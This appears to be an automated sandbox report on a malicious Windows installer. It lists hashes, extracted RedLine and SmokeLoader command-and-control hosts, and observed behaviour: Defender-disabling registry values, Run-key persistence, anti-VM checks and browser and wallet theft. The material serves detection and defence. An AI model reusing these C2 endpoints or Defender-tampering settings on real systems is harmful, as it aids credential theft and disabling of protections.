Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
458s -
max time network
1776s -
platform
windows11_x64 -
resource
win11 -
submitted
21/08/2021, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (15).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
dibild
135.148.139.222:33569
Extracted
redline
3
deyrolorme.xyz:80
xariebelal.xyz:80
anihelardd.xyz:80
Extracted
redline
19.08
95.181.172.100:6795
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7000 5856 rundll32.exe 167 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral7/memory/4204-252-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral7/memory/4204-249-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/4692-277-0x00000000057A0000-0x00000000057D2000-memory.dmp family_redline behavioral7/memory/3200-302-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral7/memory/3200-296-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral7/files/0x000300000002b1c8-319.dat family_socelars behavioral7/files/0x000300000002b1c8-318.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 32 IoCs
description pid Process procid_target PID 588 created 2692 588 WerFault.exe 144 PID 868 created 2360 868 WerFault.exe 149 PID 3608 created 3828 3608 WerFault.exe 123 PID 5580 created 3716 5580 WerFault.exe 150 PID 932 created 5908 932 WerFault.exe 168 PID 6112 created 2692 6112 WerFault.exe 144 PID 2932 created 1288 2932 WerFault.exe 142 PID 5772 created 2360 5772 WerFault.exe 149 PID 3608 created 5848 3608 WerFault.exe 176 PID 4164 created 2364 4164 WerFault.exe 129 PID 6388 created 428 6388 WerFault.exe 140 PID 6792 created 6680 6792 WerFault.exe 201 PID 3316 created 6436 3316 WerFault.exe 212 PID 2516 created 6616 2516 WerFault.exe 417 PID 1936 created 6404 1936 svchost.exe 447 PID 1948 created 4100 1948 WerFault.exe 114 PID 6040 created 1040 6040 WerFault.exe 262 PID 7540 created 6444 7540 WerFault.exe 211 PID 7996 created 6428 7996 WerFault.exe 351 PID 7956 created 2288 7956 WerFault.exe 457 PID 2984 created 5324 2984 WerFault.exe 267 PID 236 created 3024 236 WerFault.exe 276 PID 5656 created 1188 5656 WerFault.exe 177 PID 8140 created 1180 8140 msedge.exe 193 PID 6120 created 1752 6120 WerFault.exe 367 PID 6540 created 5896 6540 WerFault.exe 247 PID 6428 created 1368 6428 WerFault.exe 382 PID 3492 created 3152 3492 Cleaner.exe 266 PID 4564 created 1968 4564 11111.exe 476 PID 4812 created 5872 4812 WerFault.exe 460 PID 6204 created 2560 6204 WerFault.exe 431 PID 7756 created 2844 7756 WerFault.exe 444 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1936 created 5180 1936 svchost.exe 372 PID 1936 created 5180 1936 svchost.exe 372 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral7/memory/3828-330-0x0000000004A60000-0x0000000004AFD000-memory.dmp family_vidar behavioral7/memory/1288-463-0x00000000040D0000-0x000000000416D000-memory.dmp family_vidar -
Blocklisted process makes network request 13 IoCs
flow pid Process 290 7792 MsiExec.exe 293 7792 MsiExec.exe 295 7792 MsiExec.exe 297 7792 MsiExec.exe 299 7792 MsiExec.exe 336 7792 MsiExec.exe 339 7792 MsiExec.exe 341 7792 MsiExec.exe 290 7792 MsiExec.exe 297 7792 MsiExec.exe 299 7792 MsiExec.exe 295 7792 MsiExec.exe 293 7792 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts WerFault.exe File opened for modification C:\Windows\System32\drivers\SETCF0F.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETCF0F.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 2360 qIr_pSnhMcbIt_5Oe8fiED0b.exe 2584 X2BVdpzqm8arwIRWOLp7W9Ak.exe 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 2672 0M9wjfQFH63XI9hgboJPz8Zt.exe 2692 wrTFb1lhLEs2z2B2ytNKb8tu.exe 4176 JApsGa7I8I72qAXcYO9Sp3Qv.exe 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 560 otzsmoqMuE4r6jpG6RBaDWdA.exe 4100 4763924.exe 2680 4013451.exe 4692 3734520.exe 4280 j4fvu8qxD0jNBtzYWKC45T7j.exe 2288 6133418.exe 4204 NNW24mGiB9tvUdj42kbS7jLA.exe 4304 Setup.exe 3828 LGCH2-401_2021-08-18_14-40.exe 3484 Inlog.exe 3240 Cleaner Installation.exe 1568 WEATHER Manager.exe 1768 Conhost.exe 3048 md7_7dfj.exe 3200 j4fvu8qxD0jNBtzYWKC45T7j.exe 2364 askinstall53.exe 960 Inlog.tmp 864 MediaBurner2.exe 4416 Conhost.exe 4828 VPN.tmp 796 svchost.exe 3092 MediaBurner2.tmp 1188 3023429.exe 2692 dpqMM4s0cWF7HV_5Bh5NI1PJ.exe 132 QWkRQOfbHSqTGrIi48RLX2FQ.exe 1096 18HdUo1z2PzM80zNKzXol9Tx.exe 1288 sS4SJt7kGIn3r8zGhBAbhriC.exe 428 RjFgmagbQ7RmhF0K1UglrkFw.exe 1404 1rriD4nN4ClDd5aLFMMOfkL_.exe 3716 3mxuMDrjEgc4ckDTLozUcAjV.exe 2360 5fwi947Cu_zTcDhLWi2JZpDS.exe 4808 ZUo0uYcXQ6tawGNVdoS8xDF1.exe 1108 hSAu1cIsoj3tSOEeS695pgZd.exe 2940 09LEGzfhAptbUMxOEf3W9wFo.exe 1576 ASgUF9C77qZJY8sP5PlBHOAe.exe 4672 WinHoster.exe 1028 LivelyScreenRecS1.9.exe 5264 xtect12.exe 5480 jooyu.exe 5536 md8_8eus.exe 5624 customer3.exe 5908 zhaoy-game.exe 5100 jfiag3g_gg.exe 4812 WerFault.exe 5848 ZUo0uYcXQ6tawGNVdoS8xDF1.exe 5956 9A1.exe 1188 3023429.exe 2680 1497320.exe 2208 5013196.exe 3672 8694641.exe 4580 Setup.exe 5936 EP5CRngJUmr_7aIhS0F_Q1Zn.exe 4220 N4XjdNcFe_Z0BUJ85LvJaqql.exe 1180 2562092.exe 6152 hBS_VbW.EXE -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0M9wjfQFH63XI9hgboJPz8Zt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1rriD4nN4ClDd5aLFMMOfkL_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nffwmxmZJAiHIl7y8pU8daOL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3469.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11111.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0M9wjfQFH63XI9hgboJPz8Zt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ASgUF9C77qZJY8sP5PlBHOAe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kNDXtwCeVUVSZao6QWMcE0Or.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wU8xd95Gn4Nv_GPF8uMfYlig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8A8A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3469.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N4XjdNcFe_Z0BUJ85LvJaqql.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ASgUF9C77qZJY8sP5PlBHOAe.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 09LEGzfhAptbUMxOEf3W9wFo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8A8A.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N4XjdNcFe_Z0BUJ85LvJaqql.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1rriD4nN4ClDd5aLFMMOfkL_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 09LEGzfhAptbUMxOEf3W9wFo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kNDXtwCeVUVSZao6QWMcE0Or.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nffwmxmZJAiHIl7y8pU8daOL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wU8xd95Gn4Nv_GPF8uMfYlig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11111.exe -
Loads dropped DLL 64 IoCs
pid Process 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 1392 JApsGa7I8I72qAXcYO9Sp3Qv.tmp 3240 Cleaner Installation.exe 960 Inlog.tmp 960 Inlog.tmp 4416 Conhost.exe 4416 Conhost.exe 4828 VPN.tmp 4828 VPN.tmp 3092 MediaBurner2.tmp 6328 0wDpgt8PgMXWHUFAs91rCeA4.tmp 6328 0wDpgt8PgMXWHUFAs91rCeA4.tmp 4580 Setup.exe 6364 MsiExec.exe 6364 MsiExec.exe 6992 rundll32.exe 6992 rundll32.exe 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 6460 Setup.tmp 7940 Esplorarne.exe.com 7828 MsiExec.exe 7828 MsiExec.exe 7828 MsiExec.exe 7676 GameBoxWin64.exe 7676 GameBoxWin64.exe 7792 MsiExec.exe 7676 GameBoxWin64.exe 5448 MsiExec.exe 7532 svrwebui.exe 7532 svrwebui.exe 7532 svrwebui.exe 7532 svrwebui.exe 7532 svrwebui.exe 5448 MsiExec.exe 7532 svrwebui.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 7792 MsiExec.exe 2960 mask_svc.exe 2960 mask_svc.exe 2960 mask_svc.exe 2960 mask_svc.exe 2960 mask_svc.exe 2960 mask_svc.exe 6460 Setup.tmp 6460 Setup.tmp 2004 installer.exe 2004 installer.exe 2004 installer.exe 7016 MsiExec.exe 7016 MsiExec.exe 2844 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral7/files/0x000200000002b19e-164.dat themida behavioral7/files/0x000200000002b19e-172.dat themida behavioral7/memory/2672-198-0x0000000000E60000-0x0000000000E61000-memory.dmp themida -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions D57E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\D57E.exe = "0" D57E.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection D57E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" D57E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" D57E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" D57E.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths D57E.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet D57E.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features D57E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" D57E.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1497320.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tinaqamyru.exe\"" WerFault.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ASgUF9C77qZJY8sP5PlBHOAe.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kNDXtwCeVUVSZao6QWMcE0Or.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8A8A.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 11111.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0M9wjfQFH63XI9hgboJPz8Zt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 09LEGzfhAptbUMxOEf3W9wFo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wU8xd95Gn4Nv_GPF8uMfYlig.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3469.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N4XjdNcFe_Z0BUJ85LvJaqql.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1rriD4nN4ClDd5aLFMMOfkL_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nffwmxmZJAiHIl7y8pU8daOL.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\H: msedge.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: GameBoxWin64.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msedge.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\Z: msedge.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\V: GameBoxWin64.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\L: msedge.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\U: msedge.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msedge.exe File opened (read-only) \??\O: msedge.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msedge.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\A: msedge.exe File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\W: msedge.exe File opened (read-only) \??\Y: msedge.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\W: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 58 ipinfo.io 59 ip-api.com 134 ipinfo.io 136 ipinfo.io 43 ipinfo.io 84 ipinfo.io 133 ipinfo.io 161 ipinfo.io 243 ipinfo.io 3 ipinfo.io -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\SETADAE.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\SETADAC.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\SETADAD.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\SETADAE.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File created C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\SETADAC.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\SETADAD.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66} DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{174105fd-288b-444e-8a1e-552ded058c66}\tap0901.cat DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 2672 0M9wjfQFH63XI9hgboJPz8Zt.exe 1404 1rriD4nN4ClDd5aLFMMOfkL_.exe 1576 ASgUF9C77qZJY8sP5PlBHOAe.exe 2940 09LEGzfhAptbUMxOEf3W9wFo.exe 6608 kNDXtwCeVUVSZao6QWMcE0Or.exe 6420 nffwmxmZJAiHIl7y8pU8daOL.exe 6732 wU8xd95Gn4Nv_GPF8uMfYlig.exe 6164 8A8A.exe 7460 3469.exe 580 11111.exe 3972 Esplorarne.exe.com 7436 mask_svc.exe 2960 mask_svc.exe 4220 N4XjdNcFe_Z0BUJ85LvJaqql.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 3096 set thread context of 560 3096 otzsmoqMuE4r6jpG6RBaDWdA.exe 112 PID 2160 set thread context of 4204 2160 NNW24mGiB9tvUdj42kbS7jLA.exe 110 PID 2284 set thread context of 3200 2284 j4fvu8qxD0jNBtzYWKC45T7j.exe 121 PID 6580 set thread context of 4000 6580 0obLAuwqU13NotahfdOa_8R4.exe 248 PID 6588 set thread context of 3372 6588 yJ7vC3QI_kJL79nYmpHBKAVA.exe 349 PID 6392 set thread context of 6696 6392 HErIPJFKbSPxfnG1PfWCoFYr.exe 269 PID 3372 set thread context of 7568 3372 D57E.exe 388 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-SBL4D.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-U4STD.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-69SC8.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-R16AN.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-57O2J.tmp Setup.tmp File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-OT9JP.tmp Setup.tmp File created C:\Program Files (x86)\INL Corpo Brovse\is-KHQ0R.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-KHUU4.tmp Setup.tmp File created C:\Program Files\Internet Explorer\FMWZIGNJLC\ultramediaburner.exe.config WerFault.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm md8_8eus.exe File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 